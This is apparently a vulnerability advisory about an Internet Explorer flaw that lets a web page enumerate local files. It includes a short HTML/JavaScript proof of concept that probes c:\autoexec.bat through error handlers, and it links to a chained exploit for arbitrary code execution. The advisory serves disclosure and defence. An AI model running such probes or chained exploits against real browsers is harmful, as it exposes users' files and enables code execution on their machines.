|
|
Microsoft Internet Explorer JavaScript Local File Enumeration Vulnerability
The following example was submitted by Tom Micklovitch <h_bugtraq@yahoo.com>: <html> <head> <script language="javascript"> <!-- var fileExists = false; function yes() { alert("the file exists."); yes = true; } function no() { if(!fileExists) { alert("the file does not exist."); } } window.onerror = yes window.onload = no //--> </script> <script language="javascript" src="file://c:\autoexec.bat"></script> </head> </html> Liu Die Yu has developed a proof of concept exploit to demonstrate arbitrary code execution using a combination of unpatched Internet Explorer vulnerabilities. Successful exploitation of these vulnerabilities combines results in the execution of a cached executable file supplied by an attacker. The issues known to be exploited in cobmination with the issue described in this BID, are described in the following BIDs: BID 8980 - Microsoft Internet Explorer Double Slash Cache Zone Bypass Vulnerability BID 8886 - Microsoft Internet Explorer Local Resource Reference Vulnerability BID 8577 - Multiple Microsoft Internet Explorer Script Execution Vulnerabilities The exploit can be obtained by visiting the following demo page provided by Liu Die Yu or by downloading execdror5-Demo.zip below. http://www.safecenter.net/UMBRELLAWEBV4/execdror5/execdror5-MyPage.htm |
|
Privacy Statement |